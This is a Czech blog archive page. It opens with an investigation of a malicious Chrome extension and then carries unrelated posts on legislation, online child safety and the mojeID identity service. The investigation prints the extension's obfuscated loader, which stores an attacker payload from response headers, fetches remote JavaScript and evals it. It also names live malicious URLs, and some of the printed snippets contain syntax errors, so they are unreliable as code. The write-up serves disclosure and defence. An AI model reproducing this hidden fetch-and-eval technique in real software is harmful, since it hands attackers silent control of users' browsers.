Na systému Ubuntu se mi kdialog osvědčil lépe než přibalená utilita notify-send, která mlčela, jakmile proces běžel na pozadí. Což bylo nutné, protože past měla čekat několik dní. Konečně však jednou při spuštění podezřelého profilu prohlížeče sklapla. Malware nevolal domů pravidelně, ani po každém spuštění počítače. Ale jakmile se na obrazovce objevilo slůvko ‚TRAP!‘, šel jsem se zvědavě podívat na odposlechnutou komunikaci. K mému zklamání se jednalo pouze o pokus malwaru vyjednat si s protistranou HTTPS handshake, takže žádná zajímavá data neprošla. Nicméně jsem měl jistotu, že malware tkví v některém z doplňků. Vykopíroval jsem si celý profil z cesty /home/$USER/.config/google-chrome/Profile 2/ a prohlížeč násilně ukončil. Vrátil jsem pak profil na místo, spustil Chrome znovu a když se znovu objevilo slovo ‚TRAP!‘, měl jsem v ruce poměrně spolehlivý způsob, jak zopakovat sledovaný jev.
Protože měl profil asi gigabyte a já nevěděl, které soubory jsou podstatné pro nahrazení, užil jsem inkrementální nahrazení pomocí rsync. Při jeho volání se totiž celý souborový strom vrátí do původního stavu, nahradí se však pouze změněné soubory, takže místo přesouvání gigabytu sem a tam se jednalo o přesun několika megabytů. Nyní jsem metodou pokus a omyl mohl vypínat a zapínat jednotlivé doplňky a zkoušet poznat, který vyvolává podezřelé chování. Rychlejší však bylo spustit prohlížeč s rozšířeným výpisem na konzoli, kde je vidět, kdo se k jakým adresám připojuje.


rsync -ah "/tmp/Profile 2/" "/home/$USER/.config/google-chrome/Profile 2/" -r
google-chrome --enable-logging=stderr --v=1

Prst ukázal na rozšíření Video Downloader for FaceBook, které má víc než 200 000 uživatelů. Kontrola antivirem nic neodhalila, ani namátková prohlídka zdrojového kódu. Chtěl jsem do jeho kódu vložit několik špionážních volání console.error, které by vyzradily jakýkoli pokus připojit se na podezřelou stránku. Editace rozšíření však není bezbolestná. Jakmile změníte jedinou tečku, prohlížeč pozná, že nesedí kontrolní součet, že bylo s rozšířením manipulováno a vypne jej. Bylo třeba si jeho zdrojový kód zkopírovat a ve vývojářském režimu jej přidat jako vlastní nové rozšíření.

Jaké bylo mé překvapení, když se ukázalo, že přístupu k podezřelé stránce ani jedno z přítomných volání funkce new Request nepředchází! Mou pozornost však upoutala nenápadná funkce, strrevsstr.

function insertDecodeFunc() {
String.prototype.strrevsstr = function() {
var c = this;
if (this['length'] % 4 != 0) {
c += ('===').(slice(0, 4 - (this['length'] % 4))
}
c = atob(c['replace'](/\-/g, '+')['replace'](/_/g, '/'));
var f = parseInt(c[0] + c[1], 16);
var f2 = parseInt(c[2], 16);
// ...
console.error("decoded", this, a.join('')); // náš malý špion
return a.join('');
};
}

Podezřelá je zejména tím, že nebylo na první pohled jasné, co dělá. Rozšiřuje textové řetězce o jistý typ dekódování. Což u doplňku stahujícím video může být validní chování, přece jen jsem ale přidal volání console.error na konec funkce, abych zjistil, dochází-li ke korelaci s přístupem na podezřelou stránku a co je případně návratová hodnota funkce.
Trefa do černého. Vstupem funkce (a hodnotou this) je kódováný řetězec FuIG9Ve30tKl0YW0xfcnxCGCJpbEp5fD5iDVAHBF82T21OB1Qm.... Výstupem pak vysoce podezřelý JSON.


{"ee":"eval","jj":"$","gg":"get","uu":"https:\/\/s3.amazonaws.com\/wwwjs\/ga9anf7c53390.js?r=afd8e","cache_c":"1"}

Nejprve – kde se vzal vstup? Pochází z registru localStoarage. To je obecné datové úložiště, které prohlížeče zpřístupňují stránkám a doplňkům. Díky němu se nemusí všechna data obnovovat síťovou komunikací, ale stav aplikace může navázat tam, kde skončil. Jak se payload do localStorage dostal? Doplněk někdy namátkou natáhne přes funkci, která se tváří, že zasílá statistická data – nevinně vyhlížející GIF obrázek. Ten je zřejmě v pořádku. Nicméně doplněk naslouchá spojení k user.ampliacion.xyz a všechny hlavičky (delší deseti znaků) beze změny uloží právě do localStorage.


chrome.webRequest.onCompleted.addListener(function(details) {
details.responseHeaders.forEach(function(header) {
if (header['value'] (&& header['value'].length > 10) {
localStorage[header['name'].toLowerCase()] = header['value'];
}
})
}, {urls: ["https://user.ampliacion.xyz/*"], types: ["image"]}, ["responseHeaders"]);

Samotnou nálož pak user.ampliacion.xyz do hlaviček podstrčí pouze při správné konstelaci parametrů – napadený klient řekne svoje ID a čas instalace doplňku. Na jiném místě pak dochází ke čtení localStorage['cache-control'], a protože cache-control se jinde v textu nevyskytuje, analytik může být zmaten. Na nálož se pak zavolá již zmíněná strrevsstr. Celý výstup se pak namapuje na samotnou funkci window.


var str = localStorage['cache-control'];
control = str.strrevsstr();
control = typeof JSON != 'undefined' && JSON.parse && JSON.parse(control);
if (control && control.cache_c) {
for (var key in control) {
window[key] = control[key];
}
checked = true;
break;
}

Co útočník dokázal? Nebezpečná funkce eval, která by na sebe strhla pozornost každého, kdo by do kódu byť nakoukl, je dovedně skryta v proměnné window.ee. Podobně jsou skryta slova jQuery a get, takže v kódu daleko od sebe rozeseté příkazy,


window[jj][gg](uu, function(res) {
localStorage['cache_data'] = res;
});
window[ee](localStorage['cache_data']);

které lze považovat pouze za výsledek minimalizace kódu, je ve skutečnosti window.jQuery.get(URL), kterým se natáhne kdoví jaká špína, již pak window.eval ničím nerušen spustí. Když se sami podíváte na https://s3.amazonaws.com/wwwjs/ga9anf7c53390.js, v době psaní tohoto textu stále můžete najít 30 kB dlouhý vzorek malwaru. Používá řadu krycích technik, kde jsou jednotlivé příkazy tokenizovány do stovek lokálních proměnných, které obsahují vždy jen několik písmen příkazu. Nicméně lze poměrně snadno vidět, že přes window.XMLHttpRequest.open kontaktuje naši podezřelou adresu huffily.mydiaconal.com. A co dělá přesně? To není na první pohled jasné, ale není to ani zvlášť důležité. Může dělat totiž už úplně cokoli, co mu majitel domén podstrčí. Může čekat na to, až se objeví zranitelnost prohlížeče, kterou ještě nemáte záplatovánu a skrz kterou získá přístup do vašeho systému.

Dávejte si proto pozor, komu důvěřujete a co si do počítače a telefonu instalujete. Doufáme, že po našem nahlášení začne škodlivý kód brzy detekovat i Chrome web store. Ale jak vidno, dvě stě tisíc uživatelů a oficiální platforma není zárukou toho, že je aplikace bezpečná. Čím senzačnější a masovější aplikace, tím může být hůře. Zároveň malware může být nalepen jako daň na funkčním programu či hře. Protože doplňky však usnadňují život a dovedu si představit, že uživatel radši mávne rukou, než by se zřekl pohodlí, doporučuji vaší pozornosti vypnout nevyužívané doplňky a zapínat je pouze ad hoc.

Kategorie:

Krátké vlny (8. díl) – O hejtech, Rosomákovi a nevysílání ze sněmovny

Čt, 11/05/2020 - 10:05

„Výhodou krátkých vln je způsob jejich šíření v atmosféře – díky mnohonásobným odrazům, k nimž dochází na ionizovaných částicích ve vyšších vrstvách (ionosféra), není nutná přímá dohlednost mezi vysílačem a přijímačem, takže jejich vzájemná vzdálenost může dosáhnout i tisíců až desítek tisíc kilometrů. Slabinou jsou naopak nestabilní podmínky šíření. Prostřednictvím krátkých vln se často vysílají zahraniční programy rozhlasových stanic do zemí, kde je omezená svoboda projevu nebo kde je zavedena cenzura.“ (zdroj: Wikipedia)

 

Někdy je těžké napsat pravidelný sloupek, aby z toho nebyl jen prachsprostý hejt. Když v rámci distančního vzdělávání svých dětí (a dětí z přilehlého okolí) instalujete a sžíváte se se Školou v pyžamu, po 14 dnech nefungování přecházíte na Discord a po podzimních prázdninách se „plynule“ nastavujete na Teams, říkáte si, tak si zahejtuj, ulevíš si. A musím se pak okřiknout, protože už sám vím, že učit je těžké a učit v online prostředí ještě těžší. Klobouk dolů před všemi učiteli, kteří tuhle staronovou výzvu snaží zvládnou, jak nejlépe umí a zůstávají přitom lidmi.

Hejtovat je jednoduché a někteří si na tom skoro založili živnost. A někteří hejtují ve prospěch své živnosti. Osobně mě překvapilo, jaké hejty vygeneroval článek Ondřeje Píska k desetiletému výročí služby mojeID nebo článek Jaromíra Talíře o úskalích legislativního nastavení bankovní identity. Ta úporná až křečovitá snaha poplivat užitečnou a fungující službu pro komunikaci se státní správou je až směšná. Keep calm and use mojeID.

V legislativním kotli to klokotá a čím blíže se Poslanecká sněmovna sune k termínu voleb (nejpozději podzim 2021), tím je var v legislativním kotlíku divočejší a nevyzpytatelný. Včera proběhly dva výbory, které měly na programu novelu zákona o vojenském zpravodajství – Výbor pro obranu a Ústavně právní výbor. Ačkoliv u Výboru pro obranu bylo v pozvánce indikováno, že bude jednání streamované (jednání výboru jsou obvykle veřejná, pokud se neprojednávají utajované skutečnosti, ale epidemická opatření vyloučila z jednání výborů veřejnost), skutek ale utek a divák lačnící po informacích přišel zkrátka. Tak snad se dozvíme výsledek jednání alespoň dodatečně z audiozáznamu.

Nejen pro naplnění cíle veřejné kontroly, ale i za fanoušky přijímání zákonů doufám, že to byla spíše výjimka a stream příště bude fungovat.

(Ne)vysílání jednání sněmovního výboru.

Nezahálí ani vláda. Na příštím jednání 9. listopadu 2020 bude schvalovat návrh novely zákona o elektronických komunikacích, která má za cíl implementovat do českého právního řádu Kodex elektronických komunikací. Kodex přepracoval (a zrušil) čtyři stávající směrnice (rámcová směrnice, autorizační směrnice, přístupová směrnice a směrnice o univerzální službě). Samotná novela má 422 (!) novelizačních bodů a otvírá i další zákony, namátkou –

  • zákon o platu a dalších náležitostech spojených s výkonem funkce představitelů státní moci a některých státních orgánů a soudců a poslanců Evropského parlamentu,
  • zákon o poštovních službách,
  • zákon o integrovaném záchranném systému,
  • zákon o ochraně hospodářské soutěže,
  • zákon o provozování rozhlasového a televizního vysílání,
  • zákon o správních poplatcích,
  • zákon o posuzování shody stanovených výrobků při jejich dodávání na trh,
  • zákon o opatřeních ke snížení nákladů na zavádění vysokorychlostních sítí elektronických komunikací a další…

Takový nosič je přímo lobbistův ráj – hodně otevřených zákonů, složitá matérie, kam snadno můžete propašovat svůj pozměňovací návrh. A záleží pak na gestorovi, zda včas odhalí a rozklíčuje lobbistův záměr a dokáže argumentačně přesvědčit poslance, aby pro něj nehlasovali.

Věcně je návrh novely tématem na samotný seriál (který sepisuju), tak si teď jen popřejme, ať novela hladce propluje vládou a stihneme přijetí ještě před koncem tohoto volebního období.

Chytrá karanténa 2.0 s námi zůstane i v roce 2021. Vyplývá to z materiálu, který má projednat vláda a který již unikl do některých médií. Jak vyplývá z aktuálních dat o celkovém počtu osob s laboratorně prokázaným onemocněním COVID-19, Česká Republika se potýká s masivní druhou vlnou, přičemž bez vnějšího zásahu (úspěšný vývoj a nasazení vakcíny, konec světa) lze očekávat, že bude nutné zajistit organizačně a technicky fungování Chytré karantény i v roce 2021.

Vláda má rozhodnout, že

  • MZV a MV/NAKIT mají pokračovat v tomto projektu i v roce 2021,
  • pro veřejné zakázky realizované v rámci horizontální spolupráce mezi MZ a NAKIT má zůstat v platnosti výjimka z povinností vyplývajících z usnesení vlády č. 208 (z 22. března 2017),
  • se to zaplatí (394 mil. Kč. vč. DPH).

Inovací v roce 2021 by mělo být spuštění aplikace Rosomák. V příštím roce vznikne v rámci této aplikace kompozitní portál s kompletní obsluhou testovaného klienta – od eŽádanky, přes rezervaci termínu k výsledku testu z laboratoře, možnost samotrasování a s možnou podporou praktických lékařů (eNeschopenka). Takový Portál zavirovaného občana.

Už jste si naistalovali e-roušku?

Digitální svět pomáhá. Ať už se jedná o operátory, kteří věnují SIMkarty nebo pevné připojení rodinám, které jsou v sociální nouzi, nebo sdružení CZ.NIC, které díky držitelům domén přispěje na projekty neziskových organizací ADRA, Člověk v tísni a Linka bezpečí částkou přesahující čtvrt milion korun.

A to je dobrá zpráva! #nehejtuj

Kategorie:

Safer Internet Centrum představuje svoje aktivity i nové logo

St, 11/04/2020 - 09:46

V lednu 2019 převzalo sdružení CZ.NIC koordinaci národních aktivit zaměřených na zlepšení online bezpečnosti dětí v České republice. Nyní přichází Safer Internet Centrum s novým logem i shrnutím aktivit projektu.

Safer Internet Centrum (SIC) vzniklo pod správou sdružení CZ.NIC v České republice na začátku roku 2019. SIC patří v Evropě mezi významné instituce, které koordinují národní aktivity okolo online bezpečnosti dětí. Mnohdy spadají pod vládu dané země a kromě mnoha aktivit hrají také významnou roli při změně legislativy vztahující se k dané problematice. Naše centrum začínalo se skromnějšími ambicemi. Byli jsme si vědomi, že za dva roky nemůžeme dohnat ostatní evropská centra a jejich činnosti, které budují spousty let. Mezitím také na území České republiky vznikla celá řada organizací, které vytvořily mnoho skvělých materiálů, poraden i jiných aktivit. Díky těmto organizacím lze bez nadsázky konstatovat, že v případě preventivních aktivit jsme na evropské špičce.

Mezi klíčové aktivity českého SIC patří například provozování helplinky. Tu má na starosti hlavní partner v projektu – Linka bezpečí. Díky prostředkům z projektu je částečně financován její provoz. Denně linka přijme přes 500 hovorů od dětí. Součástí SIC je i služba STOPonline.cz, jejíž pracovníci se věnují hlášením závadného obsahu na Internetu, zejména dětské pornografie. Jen za loňský rok jsme přijali téměř čtyři tisíce incidentů.

O projektu Bezpečně na netu jsem již na tomto blogu psal. Jedná se o projekt, který je zaměřený na prevenci rizikového chování na Internetu, pod jeho hlavičkou vzniká celá řada materiálů určených školám a jejich studentům či pedagogům. Ty také navštěvujeme s mnoha našimi kurzy. Za dva roky jsme díky tomu poznali desítky škol a uspořádali několik konferencí, seminářů či kulatých stolů. Mezi naše nejúspěšnější počiny patří seriál #martyisdead. Úspěšný je natolik, že je dokonce nominován na letošní mezinárodní cenu Emmy.

Součástí Safer Internet Centra je dále projekt Tablexia. Cílem této moderní vzdělávací aplikace je podpora rozvoje kognitivních schopností. Tablexia je určena nejenom dětem s dyslexií, které navštěvují druhé stupně základních škol. Naším posledním počinem v tomto projektu bylo nedávné vydání tři nových her. V rámci aktivit SIC je potom nejmenším dětem věnováno ON-LINE ZOO, pod jehož hlavičkou vnikla kniha, audiokniha nebo omalovánky.

Jsme také koordinátory Dne bezpečnějšího Internetu, členy několika pracovních skupin, pořádáme odborné diskuze v Advisory Boardu nebo mládežnické Youth Panely. Ale o tom snad zase jindy. Věřím, že naše SIC přispívá k tomu, aby byl Internet zase o kousek bezpečnější. S kolegy se o to alespoň velice snažíme.

Kategorie:

Některé kontroverzní prvky novely zákonů zřizujících bankovní identitu

Út, 11/03/2020 - 09:51

Novelou zákona č. 21/1992 Sb., o bankách (ZoB) a zákona č. 253/2008 Sb., o některých opatřeních proti legalizaci výnosů z trestné činnosti a financování terorismu (ZoAML) schválenou letos na začátku roku si státní správa slibuje rozšíření možnosti elektronické identifikace občanů České republiky ke službám státu. Její schvalování nebylo bez problémů, ať už vzhledem k poměrně razantnímu přepsání při průchodu Poslaneckou sněmovnou tak i rozpačitým zakončením v Senátu. V Senátu tuto novelu jeden výbor, kterému bylo projednání návrhu přiděleno, schválil a druhý (ne) překvapivě zamítl. Při projednávání na plénu pak zazněla od některých senátorů ostrá slova poukazující na zbrklost v projednávání důležitého bodu a nakonec Senát k novele nepřijal žádné usnesení, čímž ji nicméně umožnil přijetí. Možná i tyto procesní peripetie nám dovolují označit tuto novelu jako nestandardní až kontroverzní. Stejně jako její obsah.

O této novele bylo napsáno mnoho. Poměrně detailně se jí například věnoval Jiří Peterka v članku na serveru Lupa.cz. Jelikož se naše sdružení před dvěma měsíci stalo kvalifikovaným správcem podle zákona o elektronické identifikaci (ZoEI), dovolím si shrnout některé body, které jsou z našeho pohledu v novelizovaných zákonech implementované ne úplně ideálně. Většina kontroverze pramení bohužel z oslabení povinností bank ve vztahu k ZoEI.

Tento zákon ve svém klíčovém paragrafu 2 nařizuje, že všechny online služby, kterým zákon ukládá povinnost ověřování totožnosti, tak mají nově činit elektronicky jen prostřednictvím kvalifikovaného systému elektronické identifikace. Paragraf je sám o sobě napsán trochu nešťastně. Myslím si, že zákonodárce chtěl místo „prostřednictvím kvalifikovaného systému elektronické identifikace“ napsat spíš „prostřednictvím národního bodu“. Takto se zdá, že například řada obcí, které již nyní umožňují elektronickou identifikaci prostřednictvím přímého napojení na mojeID (nyní již kvalifikovaného systému elektronické identifikace), splňují požadavek zákona, aniž by se napojily na národní bod. Dá se předpokládat, že ono napojení všech online služeb státu na národní bod bylo právě záměrem celého zákona. Chyba v zákoně? Těžko říct.

Nicméně chtěl bych se spíš věnovat první části tohoto paragrafu, která určuje, kdo všechno by měl mít povinnost využívat státem uznané prostředky elektronické identifikace. Paragraf je v tomto smyslu schválně formulován obecně, aby nezahrnoval jenom online služby státní správy a samosprávy, ale aby umožnil tyto prostředky využívat i v soukromoprávním světě, pokud tam existuje zákonem vyžadovaná nutnost ověřovat totožnost. Dovolím si citaci z důvodové zprávy: „Příkladem právního předpisu vyžadujícího prokázání totožnosti v oblasti soukromoprávních vztahů je zákon č. 253/2008 Sb., o některých opatřeních proti legalizaci výnosů z trestné činnosti a financování terorismu, jehož § 7 stanoví povinnost identifikace„. Je zjevné, že zákonodárce měl v první řadě na mysli, že povinnost uznávat např. elektronické občanské průkazy budou mít právě banky.

Účinnost tohoto paragrafu sice byla o dva roky odložena nicméně již od 1. července 2020 by stát měl začít aktivně vymáhat, aby všechny služby, na které se zákon vztahuje, umožňovaly přihlášení pomocí státem uznaných prostředků. Jde to evidentně pomalu, ale služby postupně přibývají a úředníci Ministerstva vnitra se aktivně snaží, aby se užitečnost prostředků elektronické identifikace zvyšovala právě rozšiřujícím se množstvím služeb, kde je můžete použít. Na jeden obor nicméně úředníci páku v podobě tohoto paragrafu ZoEI mít nebudou a jsou to právě banky. Novelou ZoAML zákonodárci stanovili, že využití kvalifikovaného systému elektronické identifikace je vedle použití elektronických prostředků bank pouze možnost, jak ověřit totožnost svých zákazníků. A protože se jedná o specifický zákon, který je nadřazený nad zákon obecný, je teď plně na rozhodnutí bank, zda-li majitelům elektronických identifikačních prostředků, jiných než jsou jejich vlastní, přistup umožní. Vzhledem k hlavní výtce, kterou veřejnost ke stávajícímu systému vznáší, týkající se malého množství podporovaných online služeb, se jedná minimálně o promarněnou příležitost. Stát mohl použití kvalifikovaného systému jednoduše vynutit, stejně jako to platí pro ostatní služby.

Není to jediný problematický bod. Zmíněná novela obsahuje další kontroverzní bod, kterým je omezení, že pokud banka umožní použití prostředku vydaného v rámci kvalifikovaného systému pro identifikaci klienta, musí se jednat o prostředek splňující úroveň záruky „vysoká“. Jako alternativu je možné použit jakýkoliv prostředek vydaný bankami splňující požadavky ZoB. Banky, které aspirují na posouzení svých prostředků podle ZoEI, ve svých prohlášeních shodně připouštějí, že jejich elektronické prostředky mohou dosáhnout pouze na úroveň záruky „značná“. Je rozhodně zvláštní, že pokud pro uznání vlastních prostředků tato úroveň stačí, pro uznání ostatních prostředků je tato úroveň nedostačující. V novele ZoB je sice zmíněn rozšiřující požadavek na fyzické ověření totožnosti, který v úrovni „značná“ není implicitně garantován, nicméně jistě by šlo rozhraní ke kvalifikovaným systémům o atribut, který by to dokladoval, rozšířit.

Opusťme ale novelu ZoAML a přejděme k vlastnímu ZoB. Tento zákon opravňuje banky podnikat v oboru elektronické identifikace a umožňuje jim stát se kvalifikovaným správcem podle ZoEI. Novela zákona jim k tomu dává poměrně silný nástroj a to je přímý přístup do základních registrů (ZR). V důvodové zprávě lze nalézt toto zdůvodnění nutnosti získání přistup k ZR: „Navrhované oprávnění zároveň dále sníží případné riziko zneužití prostředků pro elektronickou identifikaci banky, pobočky zahraniční banky nebo poskytovatele identifikačních služeb ze strany neoprávněné osoby, ale díky možnosti porovnat on-line shodu podoby fyzicky přítomné osoby sníží také četnost neoprávněného „podsunutí“ cizí identity při návštěvě pobočky„.

Ruku na srdce – banky by nebyly jediné subjekty, které by „ocenily“ přímý přístup do ZR. Operátoři, energetické firmy, všichni by měli rádi přímý přístup do ZR. Lze samozřejmě souhlasit s tím, že možnost porovnat totožnost klienta se ZR a možnost udržovat aktuální informace velkou měrou přispívá k uvedenému cíli. Zároveň je třeba říci, že stejný nástroj dává kvalifikovaným správcům již samotný ZoEI. Ten zřizuje rozhraní k národnímu bodu, které umožňuje potřebným způsobem ověřit totožnost a zároveň umožňuje informovat kvalifikovaného správce o změnách v ZR pro již ztotožněné klienty. Rozhraní národního bodu přirozeně obsahuje mnohem menší rozsah oprávnění oproti přímému přístupu do ZR. Je skutečně možné, že pro důvěryhodné ztotožnění klienta je nutné provést víc, ale proč se v takovém případě oprávnění přístupu do ZR netýká obecně všech kvalifikovaných správců? Právě ti totiž mají ze zákona povinnost důvěryhodně ověřovat totožnost. Z neznámého důvodu ale mocný nástroj, kterým je možné tuto povinnost plnit, mají mezi kvalifikovanými správci mít pouze banky.

Poslední kontroverzní bod osobně považuji za nejzvláštnější. Podle ZoEI musí kvalifikovaný správce umožnit použití svého prostředku zdarma pro všechny služby napojené na národní bod. Banky si nicméně vymohly významné omezení těchto povinností. Podle novely ZoB nemusí banky poskytovat služby zdarma všem, ale jen vybrané podskupině služeb a to jsou služby státu a samosprávních celků. Poskytovatelé ostatních služeb budou muset bankám za identifikační služby nejspíš platit (aspoň tak to vypadá z veřejně prezentovaných úvah). Důvod tohoto omezení je opět zřejmý z důvodové zprávy: „Kvalifikovaný správce je poté obecně povinen svůj kvalifikovaný systém elektronické identifikace dle § 3 ZoEI zpřístupnit všem potenciálním příjemcům elektronické identifikace (tzv. kvalifikovaným poskytovatelům – viz § 18 odst. 1 ZoEI) prostřednictvím NIA, a to zdarma. Banky a pobočky zahraničních bank v postavení kvalifikovaných správců tak nemají kvůli této úpravě možnost kontrolovat, kdo a v jakém rozsahu využívá jimi vydaný prostředek pro elektronickou identifikaci, a za jakých podmínek tak činí. Tento fakt s sebou nese pro banky a pobočky zahraničních bank nezanedbatelná rizika. Lze proto shrnout, že bankám a pobočkám zahraničních bank v souvislosti se získáním akreditace pro správu kvalifikovaného systému a s jeho následným provozem vznikají nezanedbatelné náklady a současně se banky vystavují řadě rizik (zejm. v rovině odpovědnosti za nesprávně provedenou identifikaci, resp. obecně za škodu způsobenou při správě kvalifikovaného systému podle § 9 ZoEI), to vše bez možnosti kontroly nad okruhem příjemců poskytovaných služeb a jejich podmínkami. Současná situace tak deformuje tržní prostředí v oblasti poskytování elektronické identifikace ze strany bank a poboček zahraničních bank.“

V této citaci z důvodové zprávy lze opět téměř se vším souhlasit. Pro úplný a bezpodmínečný souhlas ale musíme nahradit slova „Banky a pobočky zahraničních bank“ za slova „jakákoliv společnost“. Vždyť vše o nákladech a rizicích platí pro jakoukoliv společnost, která se rozhodne stát se kvalifikovaným správcem. V důvodové zprávě není uveden jediný důvod, který by nějak vysvětloval, v čem je banka jiná. A proč ostatním kvalifikovaným správcům povinnost poskytovat služby všem zdarma zůstala, zatímco bankám nikoliv. Banky si za tytéž služby, které ostatní kvalifikovaní správci poskytují zdarma, mohou nechat platit.

Tvorba zákonů je specifický proces a výsledné zákony jistě nebývají ideální. Proto jsme svědky častých novelizací. Zákon přinášející do českého právního řádu bankovní identitu (a s ní spojené benefity) na malém prostoru obsahuje až příliš mnoho kontroverzních bodů. Nezbývá než doufat, že zákonodárcům se alespoň ty nejpalčivější z nich podaří v dohledné době napravit. V opačném případě se dostáváme do situace, pro kterou bych si s klidným svědomím vypůjčil již jednou citovanou větu z důvodové zprávy: „Současná situace tak deformuje tržní prostředí v oblasti poskytování elektronické identifikace ze strany bank a poboček zahraničních bank.“ Významově by se nicméně smysl posunul jinam, než ji autor důvodové zprávy pravděpodobně zamýšlel.

Kategorie:

MojeID slaví. Všechno nejlepší!

Út, 10/27/2020 - 09:09

Před 10 lety bylo spuštěno mojeID, služba ověřených internetových identit. Stalo se tak po předchozím tříměsíčním testovacím provozu a zhruba rok po oznámení tohoto záměru zdejší internetové komunitě. Pro mne osobně byl 26. říjen 2010 teprve čtyřicátým druhým dnem v CZ.NIC, kam mne toho času přivedla poněkud tajemně vyhlížející pracovní inzerce slibující mimo jiné šanci být u toho, když se utváří infrastruktura českého Internetu. S mojeID byla od počátku spojena velká očekávání a z dnešního pohledu lze s trochou nadsázky říct, že jsme s ním předběhli dobu. Ale o tom později.

Slepice, vejce, evangelizace, dálnice

Jako každý start-up i mojeID tehdy řešilo typické dilema „co bylo dřív – slepice nebo vejce?“. Poskytovatelé služeb otáleli se zaváděním mojeID proto, že dosud nemělo registrované uživatele, zatímco uživatelé odkládali registraci do doby, než se mojeID podaří získat podporu atraktivních služeb.

Zatímco na uživatele na samém počátku cílila kampaň zosobněná imaginární postavou Aleše Mokrého – spot 1, spot 2, spot 3 – známého z kampaně Dobrá doména, která o rok dříve bodovala v oborových anketách, kontakt s potenciálními partnery na straně poskytovatelů služeb měl zprostředkovat obchodní reprezentant – ve sdružení zřejmě první svého druhu. Této cti se dostalo právě mně a spíše než obchodní, to byla v začátcích práce misionářská – vzrušující, inspirativní a zábavná.

MojeID technicky vzato postavené na standardu OpenID 2.0 bylo často titulováno jako „OpenID v českém kabátě“. Avšak jeho misí bylo od samého počátku mnohem víc, než jen usnadnit přihlašování k různým online službám. Přidaná hodnota mojeID spočívala v ověřování uživatelů, počínaje ověřováním kontaktních údajů (e-mail, mobilní telefon, doručovací adresa) a konče celkovým ověřením totožnosti. Představovali jsme si to tak, že pokaždé, když se uživatel přihlásí k nějaké službě, bude zároveň předávána informace o jeho úrovni ověření, podle čehož pak poskytovatel přizpůsobí rozsah služeb, které danému uživateli nabídne. Byla zde vize jakéhosi lepšího, kultivovanějšího Internetu, avšak trh v té době ještě nebyl na uskutečnění takové vize připraven. Poskytovatelé služeb tehdy překvapivě měli problémy ve zcela jiných oblastech, než které jsme dovedli řešit s naší službou my. Se zájmem si majitelé e-shopů a diskusních fór vyslechli naši nabídku řešení problému s nedoručenými zásilkami a falešnými identitami, pochválili nás, že děláme užitečnou věc, načež se zase vrátili ke svému SEO a PPC kampaním.

A tak se stalo, že jsme vybudovali infrastrukturu, postavili dálnice, vydláždili chodníky… a chvíli to vypadalo, že se budeme muset smířit s tím, že je necháme zarůst trávou. Anebo se pokusíme pro tohle všechno najít další využití a budeme přitom doufat, že se časem objeví služba, která využije potenciál mojeID v celé jeho komplexnosti.

Hledání Normandie

Vrátili jsme se tedy ke kořenům a začali mojeID promovat jako službu usnadňující registraci do nových služeb a tedy zvyšující jejich konverzi. Řekli jsme si, že na takovou nabídku by již poskytovatelé mohli slyšet lépe, obzvláště pak ti orientovaní na SEO a PPC. Pro velké online hráče jsme však byli v té době ještě zcela nezajímaví, a těch malých jsme zase nedokázali v krátkém čase oslovit dostatečné množství, aby to mělo srovnatelný efekt. Museli jsme proto najít Normandii, tedy na jinak veskrze skalnatém pobřeží Atlantiku to nejvhodnější místo k vylodění a efektivnímu proniknutí na „nepřátelské“ území.

Usoudili jsme, že problematika konverze bude nejcitlivěji vnímána v segmentu internetových prodejců (tou dobou čítajícím něco mezi 10 až 30 tisíci subjektů, dle různých zdrojů), a tak jsme se v další fázi zaměřili právě na ně. Oslovili jsme všechny velké tuzemské dodavatele e-shopových řešení a s řadou z nich navázali spolupráci. Abychom pokryli co největší část tohoto segmentu, vytvořili jsme také zásuvné moduly pro nejrozšířenější open source e-shopové platformy, které jsme nabídli volně ke stažení. Začali jsme objíždět oborové konference a sponzorovat komunitní setkání.

Výsledkem této snahy byla podpora přihlašování přes mojeID na několika tisících malých e-shopech (avšak zdaleka ne na všech byla tato funkce aktivována), ovšem k masivnějšímu rozšíření stále scházel jeden poměrně podstatný detail: uživatelé – po prvním roce provozu mělo mojeID pouze něco přes 20 tisíc uživatelů a růst uživatelské základny akceleroval jen velmi pozvolna.

Bylo jasné, že bez uživatelů lze identitní službu provozovat jen stěží. V první polovině roku 2012 jsme proto přistoupili ke kroku, který byl pro další rozvoj mojeID naprosto klíčový. Spustili jsme motivační program pro poskytovatele služeb, jehož princip byl poměrně jednoduchý: zaveďte mojeID, přiveďte nám uživatele, přesvědčte je, aby si ověřili své údaje a získejte za to provizi.

Většina zúčastněných poskytovatelů vcelku správně vyhodnotila, že větší konverze dosáhnou, pokud se o část své provize rozdělí s uživateli, a tak na nějakou dobu zaplavily online prostor nabídky předplatných e-časopisů, přístupů do jinak placených sekcí, navyšování kapacit bezplatných úložišť, ale také slevových kupónů, náramků, flash disků, powerbank nebo soutěží se slosováním o ledacos. Ve stejném roce se uživatelská základna mojeID vlivem motivačního programu rozrostla téměř o 100 tisíc nových členů a v následujícím roce se celkový počet mojeID uživatelů vyšplhal k bezmála 300 tisícům.

Kromě růstu počtu uživatelů a do programu zapojených služeb podporujících mojeID měl motivační program také zásadní vliv na brand awareness mojeID, což se v konečném důsledku odrazilo ve větší ochotě k jednání ze strany velkých online hráčů. V následujících letech se tak mojeID postupně rozšířilo například do největších tuzemských e-shopů v čele s Alzou a CZC, či mediálních domů prezentovaných Novou, Mafrou a Mladou frontou. Od roku 2013 začalo být mojeID využíváno také jako nástroj k ověřování kontaktů v registru domén, což přispělo k jeho dalšímu rozvoji.

První ověřené vlaštovky

Službě mojeID se zkrátka začalo dařit. Stále jsme však netrpělivě vyhlíželi příchod služeb, které by dokázaly využít celý její potenciál, tedy nějakým způsobem pracovat s ověřenou identitou uživatelů. Prvními vlaštovkami se stal trojlístek služeb Jízdomat, Votočvohoz a Hlídačky. Ačkoli šlo o služby typově zcela odlišné (spolujízda, komunitní secondhand, zprostředkování hlídání dětí), jednu věc měly společnou: aby mohl nově příchozí uživatel začít plnohodnotně využívat všechny funkce a výhody, musel nejprve dosáhnout určité úrovně, získat nějakou „karmu“, typicky prostřednictvím kladných referencí. Ovšem jak má nový uživatel uskutečnit první transakci nezbytnou k získání první reference, když dosud nemá žádné kladné reference? Ověření identity přes mojeID se u všech zmiňovaných služeb stalo základním stupněm žebříčku důvěryhodnosti a vyřešilo tak reálný problém nově příchozích uživatelů.

Postupem času pozvolna přibývaly další služby pracující s ověřenou identitu uživatelů, ať už v souvislosti s online prodejem věkově limitovaného zboží, nebo například s potřebou ověřit identitu diskutujících pod článkem, či jednorázově zkontrolovat místo trvalého bydliště při hlasování o participativním rozpočtu obce.

